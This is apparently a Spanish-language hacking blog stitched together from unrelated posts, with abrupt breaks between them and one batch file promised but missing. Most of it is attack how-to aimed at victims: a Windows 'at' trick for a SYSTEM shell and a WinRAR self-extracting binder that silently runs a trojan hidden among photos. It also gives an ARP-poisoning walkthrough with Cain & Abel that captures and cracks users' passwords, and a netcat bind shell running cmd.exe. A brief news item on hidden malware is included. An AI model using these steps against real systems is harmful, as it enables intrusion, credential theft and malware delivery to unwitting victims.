ahora deben poner este comando

c:/>at 20:25 /interactive “cmd.exe”

con este comando se ejecutara una shell a las 10:25

despues en la siguiente shell que se abra deven escribir esto

c:/>taskkill /F /IM explorer.exe

esto finalizara el explorer y luego ejecutan otro explorer

ponen esto en la shell

c:/>explorer.exe

y con esto pasaran a ser usuarios system
bonito bug no!!

informacion sacada de forohack.com pero explicada por mi para que lo entiendad ok

salu2
Yue

El informe es el más sombrío en su tipo presentado hasta ahora. Según Aberdeen Group, “hay que buscar de manera exhaustiva si se quiere encontrar un PC que no contenga código maligno oculto”.

“Casi todos los proveedores de conexión a Internet, muchas redes corporativas y la mayoría de los computadores de particulares contienen código activo que puede ser utilizado para espionaje electrónico, spam, robo de datos, criminalidad informática”, escribe Jim Hurley, director de seguridad informática en Aberdeen Group.

Hurley afirma que los programas ocultos eluden sin dificultar los programas de seguridad como cortafuegos, antivirus, sistemas de análisis de puertos y herramientas de detección de intrusiones.

El informe ha sido recibido con críticas por diversas compañías dedicadas a la seguridad informática. En un comentario hecho a la publicación Wired, el experto Bob Antia, de la consultora de seguridad Guardent, señala que “un PC hogareño corriente puede contener grandes cantidades de material comprometedor, pero el problema no es tan grave como se indica en el informe de Aberdeen”.

Sin embargo, el  nuevo consorcio OIS (Organization for Internet Safety), que entre sus afiliados cuenta a Microsoft, Oracle y Network Associates, confirma que la situación ha empeorado debido a que el tiempo que pasa desde la detección de un agujero de seguridad y el surgimiento de un gusano o virus que lo aprovecha, ha disminuido considerablemente.

OIS aspira a solucionar el problema estableciendo una estrecha red  de cooperación entre los grandes fabricantes de software. De esa forma se espera, entre otras cosas, conseguir que los agujeros de seguridad sean corregidos con mayor celeridad.

Hacer un Joiner/Splitter/Binder con WinRAR,

Si queremos hacer un joiner y que no lo detecte los antivirus… no te comas más la cabeza, hay una forma super sencilla, con el compresor WinRAR (descarga de su web oficial), simplemente comprimimos los archivos que queramos mandar a nuestra victima, por ejemplo unas fotillos, a la hora de comprimirlas seleccionamos también el fichero que queremos que se ejecute en segundo plano haciendo todo el mal que queramos (dejar algun puerto abierto, crear usuarios con privilegios de administrador, con comandos que me mande un mail con su IP…, le paramos el FW…) lo que sea.

Seleccionamos los ficheros que nos interesen, sobre ellos, botón derecho y “Add to archive…”

Marcamos el “Crear archivo SFX” y pulsamos sobre la pestaña “Avanzado”,

En la pestaña de “Avanzado”, hay un boton que es “Opciones SFX…”, pulsamos

En ese campo debemos meter el nombre del fichero que queremos que se ejecute en segundo plano al abrir el ejecutable/descomprimir el contenido del paquete, en mi caso un troyano bastante majo, pulsamos sobre la pestaña de “Modos”

En la pestaña de “Modes”, en “Modo de silencio” pulsamos que oculte todo, simplemente es que no se vea el ejecutable, que se ejecute de forma oculta, en silencio, Aceptamos y debería de funcionar perfectamente. Si en vez de un fichero queremos que se ejecuten varios, pues nos creamos un fichero .bat en vez de .exe con este contenido (y lo ponemos como programa que se ejecute primero en el WinRAR:

Normalmente la manera de conectar varios ordenadores en red es mediante Ethernet.
El Protocolo de Ethernet trabaja enviando informacion   a todos los host de la red mediante paquetes.
la cabezera de dichos paquetes contienen la direccion de la maquina destino. Solamente la maquina con la direcion que va en   la cabezera se supone que puede aceptar el paquete.

En el caso de   redes compartidoas (HUB’S) , todas las tarjetas de red reciben todos los paquetes y descartan los que no son para ellas, esto quiere decir que los paquetes   se envian por toda la red sin importar si la informacion debe ser entregada a esa maquina o a otra, cuando se recibe la informacion la tarjeta la descarta o no, si va dirigida a ella.
En este tipo de redes solamente   hay que sniffar todos los paquetes que pasen por nuestra tarjeta de red.

En el caso de redes conmutadas (switches) , los datos no viajan por toda la red , el trafico entre el usuario cliente y el servidor solo circulara entre ellos , sin que las demas Tarjetas se enteren.
Osea vendria hacer algo asi

                Resto de la Red (no participa en la comunicacion)

Máquina                        
(Cliente) ——– Router——- Internet——–Servidor

Para poder ver el trafico que circula entre ellos debemos posicionarnos como “Hombre en el Medio” de modo que el trafico corra asi

                                                      
Máquina
(Cliente) —–Máquina (sniffer) —- Router —-Internet—–Servidor

Para lograr esto debemos envenenar las tablas arp d la victima   y del router

*En la mayoria del paper se utiliza la palabra sniffer o sniffar para los que no saben un sniffer es un programa que se instala en una red y permite cambiar el estado de la tarjeta de red para que pueda ver todos los paquetes q circulan por la misma.   Entonces llamamos sniffar o sniffing a capturar todos los paquetes que pasen por nuestra red

Ahora si , pasemos a la practica

Escenario:

Tipo d Medio: Conmutado
Atacante: 192.168.1.198
Victima: Todos los usuarios que inicien sesion en algun servicio

Método: Envenenamiento ARP + Sniffing

Herramientas: Cain & Abel
Lo pueden descargar de http://www.oxid.it/cain.html

Lo primero que debemos hacer es descargarnos el Cain   e instalarlo en nuestro equipo (atacante). Finalizada la instalación , nos pedirá que instalemos el Wincap, un driver para la captura de paquetes
Weno ejecutamos el Cain   nos vamos para la pestaña Sniffer y lo activamos haciendo clic en el boton indicado, una vez activado hacemos clic en el signo + , vemos que nos sale una ventana   la cual nos permitira
escánear   todo el Rango de Ips de nuestra red local en busca de los pc conectados.

Finalizado el scannig debemos tener Algo Asi

*Si estuviesemos en un medio compartido,   con activar el sniffer el ataque ya estaia completo,   

Ahora vamos a proceder a realizar el envenenamiento ARP, en la   Pestana Sniffer , en la subpestana APR (abajo) , presionamos el botom   +   y aparecera el siguiente cuadro, donde podremos seleccionar los ordenadores
que queramos envenenar,como nosotros queremos sniffar toda la red, debemos seleccionar la ip del Router ya que contiene todas la demas Ips.

Muy bien, solo nos queda activar el envenenamiento ARP , para eso hacemos clic en el icono indicado, y listo tendremos toda la red envenenada de modo que el trafico que pase por nuestra red sera captado   por
nuestra maquina .

Listo , solo nos queda esperar a que algun usuario inicie sesion en algun   servidor, cuando esto ocurra el Cain capturara su pass y user , y   generara una especie de log en la subpestaña Password.

Y listo solo queda conectarse al servidor FTP con el User y Pass encontrados.

re piola , un usuario de mi red, se conecto a un recurso compartido de mi maquina, y su entrada fue logueada en la subpestaña Password, protocolo SMB:

Pero que pasa la celda del Password esta en blanco.

Lo que tenemos que hacer es crackear los hashes que hemos obtenido (LM-Hash / NT-Hash)
Para eso hacemos clic derecho en donde estan los datos y ponemos Send to Cracker, esto lo
Que hace es mandar los hashes al crackeador que viene con el Cain.

Ahora debemos ir a la pestana Cracker, clic derecho sobre los hashes y poner Start Brute Force Atack si queremos realizar un ataque por Fuerza Bruta o Start Dictionary Atack para realizar un Ataque por diccionario.
Ambas opciones pueden ser configuradas previamente pero eso se los dejo a ustedes, ya que no es nada del otro mundo.

Esto puede tardarse su tiempo pero al final conseguiremos desencriptar los hashes y obtener la contraseña del usuario victima.
Una vez que la conseguimos podemos usar algun programa de control remoto como el   Dameware Mini remote control
Aca hay un manual que hizo Zutra
http://www.foromsn.com/index2.php?Ver=Mensaje&Id=230860

o compartirle el C con el comando Net Use

Bueno eso es Todo.

Para ilustrar mejor como trabajamos con este programa, lo mejor es  que pondre pequeños y practicos ejemplos y analizar su estructura para poder comprender
mejor como funciona y asi poder crear nuestras propias aplicaciones.

 Shell Remota

Obtener un Shell rapidamente en una maquina remota usando la
opcion -l (Listen) conjuntamente con la opcion -e (ejecutar) , cuando el
proggie corre con estas variables y la coneccion es realizada, NetCat
ejecuta el programa elegido y se conecta a stdin y stdout del programa
en la coneccion la red.

nc -l -p 23 xxx.xxx.xxx.xx 23 -t -e cmd.exe

Este comando dejara NetCat escuchando el Puerto 23 (telnet) ,
cuando es conectado a traves del cliente, ejecutaran una Shell (cmd.exe).
la opcion -t le dice a NetCat que maneje cualquier negociacion que el
cliente pueda esperar….

Si esta conexiones realizada desde una maquina NT, el shell
correr los permisos del proceso que han generado a NetCat.

Sniffer:

Otra de las interesante posibilidades de netcat es su capacidad para
escuchar conecciones en cualquier puerto, pudiendo redireccionar todo el
trafico del mismo hacia un archivo o hacia pantalla, en este sencillo
ejemplo, podemos observar las bases de un sencillo sniffer en Windows:

C:\nc11nt>nc -v -v -L 127.0.0.1 -p 23

DNS fwd/rev mismatch: localhost != NKRA
listening on [any] 23 …
DNS fwd/rev mismatch: localhost != NKRA
connect to [127.0.0.1] from localhost [127.0.0.1] 1131
login: sniffado
password: jeje!!

Tambien podemos redireccionar toda la salida a un archivo e
irnos a realizar otras actividades ,ientras netcat hace su trabajo:

C:\nc11nt>nc -v -v -L -p 23 127.0.0.1 -t >login.txt
DNS fwd/rev mismatch: localhost != NKRA
listening on [any] 23 …

[Aqui viene la connecion.]

DNS fwd/rev mismatch: localhost != NKRA
connect to [127.0.0.1] from localhost [127.0.0.1] 1030

[Todo lo que escriba la conneccion se va al archivo login.txt]
sent 0, rcvd 42

La opcion L permite que netcat escuche nuevamente al terminar la coneccion

Scann de Puertos

Netcat puede ser utilizado como scanner, sus multiples opciones
le permiten realizar un gran numero de combinaciones, pudiendo realizar
Scannings en Puertos Random, en puertos conocidos, en modo ascendente o
descendente, con intervalos de tiempo, utilizando gateways para evitar
mostrar la IP fuente del Scanning, etc.

C:\nc11nt>nc -v -v -z 127.0.0.1 53 25 21

DNS fwd/rev mismatch: localhost != NKRA
localhost [127.0.0.1] 53 (domain): connection refused
localhost [127.0.0.1] 25 (smtp): connection refused
localhost [127.0.0.1] 21 (ftp): connection refused
sent 0, rcvd 0: NOTSOCK

Pues si; aqui tienen un pequeño y primitivo scanner, se le
puede  asignarle un rango de puertos:

C:\nc11nt>nc -v -v -z 127.0.0.1 1-53

DNS fwd/rev mismatch: localhost != darkstar
localhost [127.0.0.1] 53 (domain): connection refused
localhost [127.0.0.1] 52 (?): connection refused
localhost [127.0.0.1] 51 (?): connection refused
localhost [127.0.0.1] 50 (?): connection refused
localhost [127.0.0.1] 49 (?): connection refused
localhost [127.0.0.1] 48 (?): connection refused etc…

Volvemos con la opcion v (verbose) y la Opcion z (zero i/o)
que es usada para scanning, los puertos se lo especificamos al final del
IP del host, bien sea individuales separados por un espacio; o por un
rango de puertos.

Espero les sirva de algo este pequeño manualillo de algunos comandos del NC

Editado por mi NKRA sal2

2. Busca una web que no te guste xD

Bueno abrimos el SSS. (Ya bajado e instalado.)

Una vez que ya lo tenemos abierto vamos a proceder a escaner los Bugs 

paso 1.-New Session le damos en Next 

paso 2.- Add Host(agregamos un host a escanear ) Ejemplo www.pagina.com le damos en  Next otravez Next.

Click donde dice página…. y luego a Start Scan.

Esperamos a que se termine el scan 

Vemos en la solapa Vulnerabilitis y chequeamos el Bug, (Si está en rojo mejor) vamos a www.securityfocus.com Y vemos que podemos hacer  Si no entiendes la web, vamos a Google Y vemos como explotar ese bug. 

Es mi primer estancia en este blog no sean exigentes ire mejorando mis mensajes gracias!!!! 

Saludos.